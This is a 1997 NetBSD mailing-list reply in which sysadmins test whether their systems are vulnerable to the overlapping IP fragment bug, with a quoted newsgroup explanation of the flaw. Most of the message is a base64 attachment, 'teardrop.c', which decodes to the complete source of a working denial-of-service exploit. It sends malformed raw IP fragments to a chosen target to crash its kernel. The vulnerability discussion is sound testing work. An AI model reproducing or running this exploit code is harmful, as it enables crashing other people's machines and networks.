Subject: Re: Fwd: Re: TCP Fragment bugs
To: Rick Byers <rickb@iaw.on.ca>
From: Erik Rungi <blackbox@openface.ca>
List: port-i386
Date: 11/17/1997 14:04:29
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--0-808829534-879793338=:10482
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.NEB.3.96.971117140224.10482D@spamburger.openface.ca>
On Mon, 17 Nov 1997, Rick Byers wrote:
> I tried the exploit (that easily crashed NT and 95) on NetBSD 1.3_ALPHA
> and 1.2.1 and neither showed any sign of having problems...
I built "teardrop" under linux and targetted a few of my netbsd machines (1.2,
1.2.1, 1.3_ALPHA all i386) and they all survived without any immediate ill
effects. Targetting my linux box made it crash hard.
The wierd thing is I compiled the source under NetBSD-1.2/i386 stock, and it
made my NetBSD machine die and reset! I used the arguments "teardrop
123.123.123.123 207.134.157.133 -n 10", and my source machine died! I tried
this twice, and both times my netbsd machine went into the console countdown
core-dump thing, and then reset itself!
Attached is the source I used.
If anybody cares to verify this, I'd appreciate it.
EJR
>
> On Mon, 17 Nov 1997, Heiko W.Rupp wrote:
>
> > Can anyone check weather NetBSD is/will be vulnerable to this?
> >
> > If 1.3_a is, then this also would need to be fixed before.
> >
> >
> > Path: pilhuhn.de!snert!blackbush.xlink.net!fu-berlin.de!cpk-news-hub1.bbnplanet.
> > com!news.bbnplanet.com!europa.clark.net!209.70.91.68!news.clark.net!not-for-mai
> > l
> > From: proberts@clark.net (Paul D. Robertson)
> > Newsgroups: comp.security.firewalls
> > Subject: Re: TCP Fragment bugs
> > Date: 16 Nov 1997 18:50:57 GMT
> > Organization: Clark Internet Services, Inc., Ellicott City, MD USA
> > Lines: 40
> > Message-ID: <64nfah$m26@clarknet.clark.net>
> > References: <64j43n$56u@clarknet.clark.net> <346E54A9.6A44@cyberus.ca>
> > NNTP-Posting-Host: explorer.clark.net
> > Mime-Version: 1.0
> > Content-Type: TEXT/PLAIN; charset=ISO-8859-1
> > Content-Transfer-Encoding: 8bit
> > X-Newsreader: TIN [UNIX 1.3 950726BETA PL0]
> > Xref: pilhuhn.de comp.security.firewalls:4349
> >
> > James C. Grant (no.spam@cyberus.ca) is rumored to have uttered :
> > : Can anyone point be toward the exploit code or specify
> > : how this attack works?
> >
> > The description from BUGTRAQ:
> >
> > If we find that the current fragment's offset is inside the end of a
> > previous fragment (overlap), we need to (try) to align it correctly.
> > Well, this is fine and good, unless the current fragment happens to NOT
> > contain enough data to cover the realigning. In that case, `offset`
> > will end up being larger than `end`. These two values are passed to
> > `ip_frag_create()` where the length of the fragment data is computed.
> >
> > Basicly, end - offset ends up being negative, and the resulting memory
> > copy kills the box. Unpatched Linux will fail at 2 packets, NT/95 seems
> > to want 10-15.
> >
> > : ConSeal PC FIREWALL intercepts packets (95 now, NT real soon)
> > : and I would like to catch this attack in the firewall, if possible.
> >
> > You'd have to maintain state informtaion for all fragmented packets in a
> > TCP stream until the subsequent fragment is recieved, then compare the
> > offset start address with the length of the previous packet.
> >
> > This is probably not stoppable without a stateful packet filter, and even
> > then I'd think it would be rather trivial to DoS attack the filter by
> > sending very large fragments. It's much better fixed at the stack, or
> > by using a proxy which isn't vulnerable. The Linux fix is one line of
> > code in the fragment reassembly routine. A larger fix in circulation adds
> > some printk's for logging that the attack has been attempted.
> >
> > 'Personal firewalls' really don't address these types of issues well.
> > In this case, having an invulnerable proxy server, or fixing a vulnerable
> > proxy server as quickly as possible makes the most sense.
> >
> > Paul
> > -----------------------------------------------------------------------------
> > Paul D. Robertson "My statements in this message are personal opinions
> > proberts@clark.net which may have no basis whatsoever in fact."
> > PSB#9280
> >
>
> =========================================================================
> Rick Byers Internet Access Worldwide
> rickb@iaw.on.ca System Admin
> University of Waterloo, Computer Science (905)714-1400
> http://www.iaw.on.ca/rickb/ http://www.iaw.on.ca/
>
Openface Internet Inc. Erik Rungi
Montreal, Canada rungus at openface.ca
(514) 281-8585 Technical Director
Web Services, Software Development OpenFace INC
--0-808829534-879793338=:10482
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="teardrop.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.NEB.3.96.971117140218.10482B@spamburger.openface.ca>
Content-Description:
LyoNDQogKiAgQ29weXJpZ2h0IChjKSAxOTk3IHJvdXRlfGRhZW1vbjkgIDxy
b3V0ZUBpbmZvbmV4dXMuY29tPiAxMS4zLjk3DQ0KICoNDQogKiAgTGludXgv
TlQvOTUgT3ZlcmxhcCBmcmFnIGJ1ZyBleHBsb2l0DQ0KICoNDQogKiAgRXhw
bG9pdHMgdGhlIG92ZXJsYXBwaW5nIElQIGZyYWdtZW50IGJ1ZyBwcmVzZW50
IGluIGFsbCBMaW51eCBrZXJuZWxzIGFuZA0NCiAqICBOVCA0LjAgLyBXaW5k
b3dzIDk1IChvdGhlcnM/KQ0NCiAqDQ0KICogIEJhc2VkIG9mZiBvZjogICBm
bGlwLmMgYnkga2xlcHRvDQ0KICogIENvbXBpbGVzIG9uOiAgICBMaW51eCwg
KkJTRCoNDQogKg0NCiAqICBnY2MgLU8yIHRlYXJkcm9wLmMgLW8gdGVhcmRy
b3ANDQogKiAgICAgIE9SDQ0KICogIGdjYyAtTzIgdGVhcmRyb3AuYyAtbyB0
ZWFyZHJvcCAtRFNUUkFOR0VfQlNEX0JZVEVfT1JERVJJTkdfVEhJTkcNDQog
Ki8NDQoNDQojaW5jbHVkZSA8c3RkaW8uaD4NDQojaW5jbHVkZSA8c3RkbGli
Lmg+DQ0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0NCiNpbmNsdWRlIDxzdHJpbmcu
aD4NDQojaW5jbHVkZSA8bmV0ZGIuaD4NDQojaW5jbHVkZSA8bmV0aW5ldC9p
bi5oPg0NCiNpbmNsdWRlIDxuZXRpbmV0L3VkcC5oPg0NCiNpbmNsdWRlIDxh
cnBhL2luZXQuaD4NDQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQ0KI2luY2x1
ZGUgPHN5cy90aW1lLmg+DQ0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NDQoN
DQojaWZkZWYgU1RSQU5HRV9CU0RfQllURV9PUkRFUklOR19USElORw0NCiAg
ICAgICAgICAgICAgICAgICAgICAgIC8qIE9wZW5CU0QgPCAyLjEsIGFsbCBG
cmVlQlNEIGFuZCBuZXRCU0QsIEJTRGkgPCAzLjAgKi8NDQojZGVmaW5lIEZJ
WChuKSAgKG4pDQ0KI2Vsc2UgICAgICAgICAgICAgICAgICAgLyogT3BlbkJT
RCAyLjEsIGFsbCBMaW51eCAqLw0NCiNkZWZpbmUgRklYKG4pICBodG9ucyhu
KQ0NCiNlbmRpZiAgLyogU1RSQU5HRV9CU0RfQllURV9PUkRFUklOR19USElO
RyAqLw0NCg0NCiNkZWZpbmUgSVBfTUYgICAweDIwMDAgIC8qIE1vcmUgSVAg
ZnJhZ21lbnQgZW4gcm91dGUgKi8NDQojZGVmaW5lIElQSCAgICAgMHgxNCAg
ICAvKiBJUCBoZWFkZXIgc2l6ZSAqLw0NCiNkZWZpbmUgVURQSCAgICAweDgg
ICAgIC8qIFVEUCBoZWFkZXIgc2l6ZSAqLw0NCiNkZWZpbmUgUEFERElORyAw
eDFjICAgIC8qIGRhdGFncmFtIGZyYW1lIHBhZGRpbmcgZm9yIGZpcnN0IHBh
Y2tldCAqLw0NCiNkZWZpbmUgTUFHSUMgICAweDMgICAgIC8qIE1hZ2ljIEZy
YWdtZW50IENvbnN0YW50ICh0bSkuICBTaG91bGQgYmUgMiBvciAzICovDQ0K
I2RlZmluZSBDT1VOVCAgIDB4MSAgICAgLyogTGludXggZGllcyB3aXRoIDEs
IE5UIGlzIG1vcmUgc3RhbHdhcnQgYW5kIGNhbg0NCiAgICAgICAgICAgICAg
ICAgICAgICAgICAqIHdpdGhzdGFuZCBtYXliZSA1IG9yIDEwIHNvbWV0aW1l
cy4uLiAgRXhwZXJpbWVudC4NDQogICAgICAgICAgICAgICAgICAgICAgICAg
Ki8NDQp2b2lkIHVzYWdlKHVfY2hhciAqKTsNDQp1X2xvbmcgbmFtZV9yZXNv
bHZlKHVfY2hhciAqKTsNDQp1X3Nob3J0IGluX2Nrc3VtKHVfc2hvcnQgKiwg
aW50KTsNDQp2b2lkIHNlbmRfZnJhZ3MoaW50LCB1X2xvbmcsIHVfbG9uZywg
dV9zaG9ydCwgdV9zaG9ydCk7DQ0KDQ0KaW50IG1haW4oaW50IGFyZ2MsIGNo
YXIgKiphcmd2KQ0NCnsNDQogICAgaW50IG9uZSA9IDEsIGNvdW50ID0gMCwg
aSwgcmlwX3NvY2s7DQ0KICAgIHVfbG9uZyAgc3JjX2lwID0gMCwgZHN0X2lw
ID0gMDsNDQogICAgdV9zaG9ydCBzcmNfcHJ0ID0gMCwgZHN0X3BydCA9IDA7
DQ0KICAgIHN0cnVjdCBpbl9hZGRyIGFkZHI7DQ0KDQ0KICAgIGZwcmludGYo
c3RkZXJyLCAidGVhcmRyb3AgICByb3V0ZXxkYWVtb245XG5cbiIpOw0NCg0N
CiAgICBpZigocmlwX3NvY2sgPSBzb2NrZXQoQUZfSU5FVCwgU09DS19SQVcs
IElQUFJPVE9fUkFXKSkgPCAwKQ0NCiAgICB7DQ0KICAgICAgICBwZXJyb3Io
InJhdyBzb2NrZXQiKTsNDQogICAgICAgIGV4aXQoMSk7DQ0KICAgIH0NDQog
ICAgaWYgKHNldHNvY2tvcHQocmlwX3NvY2ssIElQUFJPVE9fSVAsIElQX0hE
UklOQ0wsIChjaGFyICopJm9uZSwgc2l6ZW9mKG9uZSkpDQ0KICAgICAgICA8
IDApDQ0KICAgIHsNDQogICAgICAgIHBlcnJvcigiSVBfSERSSU5DTCIpOw0N
CiAgICAgICAgZXhpdCgxKTsNDQogICAgfQ0NCiAgICBpZiAoYXJnYyA8IDMp
IHVzYWdlKGFyZ3ZbMF0pOw0NCiAgICBpZiAoIShzcmNfaXAgPSBuYW1lX3Jl
c29sdmUoYXJndlsxXSkpIHx8ICEoZHN0X2lwID0gbmFtZV9yZXNvbHZlKGFy
Z3ZbMl0pKSkNDQogICAgew0NCiAgICAgICAgZnByaW50ZihzdGRlcnIsICJX
aGF0IHRoZSBoZWxsIGtpbmQgb2YgSVAgYWRkcmVzcyBpcyB0aGF0P1xuIik7
DQ0KICAgICAgICBleGl0KDEpOw0NCiAgICB9DQ0KDQ0KICAgIHdoaWxlICgo
aSA9IGdldG9wdChhcmdjLCBhcmd2LCAiczp0Om46IikpICE9IEVPRikNDQog
ICAgew0NCiAgICAgICAgc3dpdGNoIChpKQ0NCiAgICAgICAgew0NCiAgICAg
ICAgICAgIGNhc2UgJ3MnOiAgICAgICAgICAgICAgIC8qIHNvdXJjZSBwb3J0
IChzaG91bGQgYmUgZW1waGVtZXJhbCkgKi8NDQogICAgICAgICAgICAgICAg
c3JjX3BydCA9ICh1X3Nob3J0KWF0b2kob3B0YXJnKTsNDQogICAgICAgICAg
ICAgICAgYnJlYWs7DQ0KICAgICAgICAgICAgY2FzZSAndCc6ICAgICAgICAg
ICAgICAgLyogZGVzdCBwb3J0IChETlMsIGFueW9uZT8pICovDQ0KICAgICAg
ICAgICAgICAgIGRzdF9wcnQgPSAodV9zaG9ydClhdG9pKG9wdGFyZyk7DQ0K
ICAgICAgICAgICAgICAgIGJyZWFrOw0NCiAgICAgICAgICAgIGNhc2UgJ24n
OiAgICAgICAgICAgICAgIC8qIG51bWJlciB0byBzZW5kICovDQ0KICAgICAg
ICAgICAgICAgIGNvdW50ICAgPSBhdG9pKG9wdGFyZyk7DQ0KICAgICAgICAg
ICAgICAgIGJyZWFrOw0NCiAgICAgICAgICAgIGRlZmF1bHQgOg0NCiAgICAg
ICAgICAgICAgICB1c2FnZShhcmd2WzBdKTsNDQogICAgICAgICAgICAgICAg
YnJlYWs7ICAgICAgICAgICAgICAvKiBOT1RSRUFDSEVEICovDQ0KICAgICAg
ICB9DQ0KICAgIH0NDQogICAgc3JhbmRvbSgodW5zaWduZWQpKHRpbWUoKHRp
bWVfdCkwKSkpOw0NCiAgICBpZiAoIXNyY19wcnQpIHNyY19wcnQgPSAocmFu
ZG9tKCkgJSAweGZmZmYpOw0NCiAgICBpZiAoIWRzdF9wcnQpIGRzdF9wcnQg
PSAocmFuZG9tKCkgJSAweGZmZmYpOw0NCiAgICBpZiAoIWNvdW50KSAgIGNv
dW50ICAgPSBDT1VOVDsNDQoNDQogICAgZnByaW50ZihzdGRlcnIsICJEZWF0
aCBvbiBmbGF4ZW4gd2luZ3M6XG4iKTsNDQogICAgYWRkci5zX2FkZHIgPSBz
cmNfaXA7DQ0KICAgIGZwcmludGYoc3RkZXJyLCAiRnJvbTogJTE1cy4lNWRc
biIsIGluZXRfbnRvYShhZGRyKSwgc3JjX3BydCk7DQ0KICAgIGFkZHIuc19h
ZGRyID0gZHN0X2lwOw0NCiAgICBmcHJpbnRmKHN0ZGVyciwgIiAgVG86ICUx
NXMuJTVkXG4iLCBpbmV0X250b2EoYWRkciksIGRzdF9wcnQpOw0NCiAgICBm
cHJpbnRmKHN0ZGVyciwgIiBBbXQ6ICU1ZFxuIiwgY291bnQpOw0NCiAgICBm
cHJpbnRmKHN0ZGVyciwgIlsgIik7DQ0KDQ0KICAgIGZvciAoaSA9IDA7IGkg
PCBjb3VudDsgaSsrKQ0NCiAgICB7DQ0KICAgICAgICBzZW5kX2ZyYWdzKHJp
cF9zb2NrLCBzcmNfaXAsIGRzdF9pcCwgc3JjX3BydCwgZHN0X3BydCk7DQ0K
ICAgICAgICBmcHJpbnRmKHN0ZGVyciwgImIwMG0gIik7DQ0KICAgICAgICB1
c2xlZXAoNTAwKTsNDQogICAgfQ0NCiAgICBmcHJpbnRmKHN0ZGVyciwgIl1c
biIpOw0NCiAgICByZXR1cm4gKDApOw0NCn0NDQoNDQovKg0NCiAqICBTZW5k
IHR3byBJUCBmcmFnbWVudHMgd2l0aCBwYXRob2xvZ2ljYWwgb2Zmc2V0cy4g
IFdlIHVzZSBhbiBpbXBsZW1lbnRhdGlvbg0NCiAqICBpbmRlcGVuZGVudCB3
YXkgb2YgYXNzZW1ibGluZyBuZXR3b3JrIHBhY2tldHMgdGhhdCBkb2VzIG5v
dCByZWx5IG9uIGFueSBvZg0NCiAqICB0aGUgZGl2ZXJzZSBPL1Mgc3BlY2lm
aWMgbm9tZW5jbGF0dXJlIGhpbmRlcmFuY2VzICh3ZWxsLCBsaW51eCB2cy4g
QlNEKS4NDQogKi8NDQoNDQp2b2lkIHNlbmRfZnJhZ3MoaW50IHNvY2ssIHVf
bG9uZyBzcmNfaXAsIHVfbG9uZyBkc3RfaXAsIHVfc2hvcnQgc3JjX3BydCwN
DQogICAgICAgICAgICAgICAgdV9zaG9ydCBkc3RfcHJ0KQ0NCnsNDQogICAg
dV9jaGFyICpwYWNrZXQgPSBOVUxMLCAqcF9wdHIgPSBOVUxMOyAgIC8qIHBh
Y2tldCBwb2ludGVycyAqLw0NCiAgICB1X2NoYXIgYnl0ZTsgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgLyogYSBieXRlICovDQ0KICAgIHN0cnVjdCBz
b2NrYWRkcl9pbiBzaW47ICAgICAgICAgICAgICAgICAvKiBzb2NrZXQgcHJv
dG9jb2wgc3RydWN0dXJlICovDQ0KDQ0KICAgIHNpbi5zaW5fZmFtaWx5ICAg
ICAgPSBBRl9JTkVUOw0NCiAgICBzaW4uc2luX3BvcnQgICAgICAgID0gc3Jj
X3BydDsNDQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGRzdF9pcDsNDQoN
DQogICAgLyoNDQogICAgICogR3JhYiBzb21lIG1lbW9yeSBmb3Igb3VyIHBh
Y2tldCwgYWxpZ24gcF9wdHIgdG8gcG9pbnQgYXQgdGhlIGJlZ2lubmluZw0N
CiAgICAgKiBvZiBvdXIgcGFja2V0LCBhbmQgdGhlbiBmaWxsIGl0IHdpdGgg
emVyb3MuDQ0KICAgICAqLw0NCiAgICBwYWNrZXQgPSAodV9jaGFyICopbWFs
bG9jKElQSCArIFVEUEggKyBQQURESU5HKTsNDQogICAgcF9wdHIgID0gcGFj
a2V0Ow0NCiAgICBiemVybygodV9jaGFyICopcF9wdHIsIElQSCArIFVEUEgg
KyBQQURESU5HKTsNDQoNDQogICAgYnl0ZSA9IDB4NDU7ICAgICAgICAgICAg
ICAgICAgICAgICAgLyogSVAgdmVyc2lvbiBhbmQgaGVhZGVyIGxlbmd0aCAq
Lw0NCiAgICBtZW1jcHkocF9wdHIsICZieXRlLCBzaXplb2YodV9jaGFyKSk7
DQ0KICAgIHBfcHRyICs9IDI7ICAgICAgICAgICAgICAgICAgICAgICAgIC8q
IElQIFRPUyAoc2tpcHBlZCkgKi8NDQogICAgKigodV9zaG9ydCAqKXBfcHRy
KSA9IEZJWChJUEggKyBVRFBIICsgUEFERElORyk7ICAgIC8qIHRvdGFsIGxl
bmd0aCAqLw0NCiAgICBwX3B0ciArPSAyOw0NCiAgICAqKCh1X3Nob3J0ICop
cF9wdHIpID0gaHRvbnMoMjQyKTsgICAvKiBJUCBpZCAqLw0NCiAgICBwX3B0
ciArPSAyOw0NCiAgICAqKCh1X3Nob3J0ICopcF9wdHIpIHw9IEZJWChJUF9N
Rik7ICAvKiBJUCBmcmFnIGZsYWdzIGFuZCBvZmZzZXQgKi8NDQogICAgcF9w
dHIgKz0gMjsNDQogICAgKigodV9zaG9ydCAqKXBfcHRyKSA9IDB4NDA7ICAg
ICAgICAgLyogSVAgVFRMICovDQ0KICAgIGJ5dGUgPSBJUFBST1RPX1VEUDsN
DQogICAgbWVtY3B5KHBfcHRyICsgMSwgJmJ5dGUsIHNpemVvZih1X2NoYXIp
KTsNDQogICAgcF9wdHIgKz0gNDsgICAgICAgICAgICAgICAgICAgICAgICAg
LyogSVAgY2hlY2tzdW0gZmlsbGVkIGluIGJ5IGtlcm5lbCAqLw0NCiAgICAq
KCh1X2xvbmcgKilwX3B0cikgPSBzcmNfaXA7ICAgICAgICAvKiBJUCBzb3Vy
Y2UgYWRkcmVzcyAqLw0NCiAgICBwX3B0ciArPSA0Ow0NCiAgICAqKCh1X2xv
bmcgKilwX3B0cikgPSBkc3RfaXA7ICAgICAgICAvKiBJUCBkZXN0aW5hdGlv
biBhZGRyZXNzICovDQ0KICAgIHBfcHRyICs9IDQ7DQ0KICAgICooKHVfc2hv
cnQgKilwX3B0cikgPSBodG9ucyhzcmNfcHJ0KTsgICAgICAgLyogVURQIHNv
dXJjZSBwb3J0ICovDQ0KICAgIHBfcHRyICs9IDI7DQ0KICAgICooKHVfc2hv
cnQgKilwX3B0cikgPSBodG9ucyhkc3RfcHJ0KTsgICAgICAgLyogVURQIGRl
c3RpbmF0aW9uIHBvcnQgKi8NDQogICAgcF9wdHIgKz0gMjsNDQogICAgKigo
dV9zaG9ydCAqKXBfcHRyKSA9IGh0b25zKDggKyBQQURESU5HKTsgICAvKiBV
RFAgdG90YWwgbGVuZ3RoICovDQ0KDQ0KICAgIGlmIChzZW5kdG8oc29jaywg
cGFja2V0LCBJUEggKyBVRFBIICsgUEFERElORywgMCwgKHN0cnVjdCBzb2Nr
YWRkciAqKSZzaW4sDQ0KICAgICAgICAgICAgICAgIHNpemVvZihzdHJ1Y3Qg
c29ja2FkZHIpKSA9PSAtMSkNDQogICAgew0NCiAgICAgICAgcGVycm9yKCJc
bnNlbmR0byIpOw0NCiAgICAgICAgZnJlZShwYWNrZXQpOw0NCiAgICAgICAg
ZXhpdCgxKTsNDQogICAgfQ0NCg0NCiAgICAvKiAgV2Ugc2V0IHRoZSBmcmFn
bWVudCBvZmZzZXQgdG8gYmUgaW5zaWRlIG9mIHRoZSBwcmV2aW91cyBwYWNr
ZXQncw0NCiAgICAgKiAgcGF5bG9hZCAoaXQgb3ZlcmxhcHMgaW5zaWRlIHRo
ZSBwcmV2aW91cyBwYWNrZXQpIGJ1dCBkbyBub3QgaW5jbHVkZQ0NCiAgICAg
KiAgZW5vdWdoIHBheWxvYWQgdG8gY292ZXIgY29tcGxldGUgdGhlIGRhdGFn
cmFtLiAgSnVzdCB0aGUgaGVhZGVyIHdpbGwNDQogICAgICogIGRvLCBidXQg
dG8gY3Jhc2ggTlQvOTUgbWFjaGluZXMsIGEgYml0IGxhcmdlciBvZiBwYWNr
ZXQgc2VlbXMgdG8gd29yaw0NCiAgICAgKiAgYmV0dGVyLg0NCiAgICAgKi8N
DQogICAgcF9wdHIgPSAmcGFja2V0WzJdOyAgICAgICAgIC8qIElQIHRvdGFs
IGxlbmd0aCBpcyAyIGJ5dGVzIGludG8gdGhlIGhlYWRlciAqLyAgICAqKCh1
X3Nob3J0ICopcF9wdHIpID0gRklYKElQSCArIE1BR0lDICsgMSk7DQ0KICAg
IHBfcHRyICs9IDQ7ICAgICAgICAgICAgICAgICAvKiBJUCBvZmZzZXQgaXMg
NiBieXRlcyBpbnRvIHRoZSBoZWFkZXIgKi8NDQogICAgKigodV9zaG9ydCAq
KXBfcHRyKSA9IEZJWChNQUdJQyk7DQ0KDQ0KICAgIGlmIChzZW5kdG8oc29j
aywgcGFja2V0LCBJUEggKyBNQUdJQyArIDEsIDAsIChzdHJ1Y3Qgc29ja2Fk
ZHIgKikmc2luLA0NCiAgICAgICAgICAgICAgICBzaXplb2Yoc3RydWN0IHNv
Y2thZGRyKSkgPT0gLTEpDQ0KICAgIHsNDQogICAgICAgIHBlcnJvcigiXG5z
ZW5kdG8iKTsNDQogICAgICAgIGZyZWUocGFja2V0KTsNDQogICAgICAgIGV4
aXQoMSk7DQ0KICAgIH0NDQogICAgZnJlZShwYWNrZXQpOw0NCn0NDQoNDQp1
X2xvbmcgbmFtZV9yZXNvbHZlKHVfY2hhciAqaG9zdF9uYW1lKQ0NCnsNDQog
ICAgc3RydWN0IGluX2FkZHIgYWRkcjsNDQogICAgc3RydWN0IGhvc3RlbnQg
Kmhvc3RfZW50Ow0NCg0NCiAgICBpZiAoKGFkZHIuc19hZGRyID0gaW5ldF9h
ZGRyKGhvc3RfbmFtZSkpID09IC0xKQ0NCiAgICB7DQ0KICAgICAgICBpZiAo
IShob3N0X2VudCA9IGdldGhvc3RieW5hbWUoaG9zdF9uYW1lKSkpIHJldHVy
biAoMCk7DQ0KICAgICAgICBiY29weShob3N0X2VudC0+aF9hZGRyLCAoY2hh
ciAqKSZhZGRyLnNfYWRkciwgaG9zdF9lbnQtPmhfbGVuZ3RoKTsNDQogICAg
fQ0NCiAgICByZXR1cm4gKGFkZHIuc19hZGRyKTsNDQp9DQ0KDQ0Kdm9pZCB1
c2FnZSh1X2NoYXIgKm5hbWUpDQ0Kew0NCiAgICBmcHJpbnRmKHN0ZGVyciwN
DQogICAgICAgICAgICAiJXMgc3JjX2lwIGRzdF9pcCBbIC1zIHNyY19wcnQg
XSBbIC10IGRzdF9wcnQgXSBbIC1uIGhvd19tYW55IF1cbiIsDQ0KICAgICAg
ICAgICAgbmFtZSk7DQ0KICAgIGV4aXQoMCk7DQ0KfQ0NCg0NCi8qIEVPRiAq
Lw0NCg0NCg0NCg==
--0-808829534-879793338=:10482--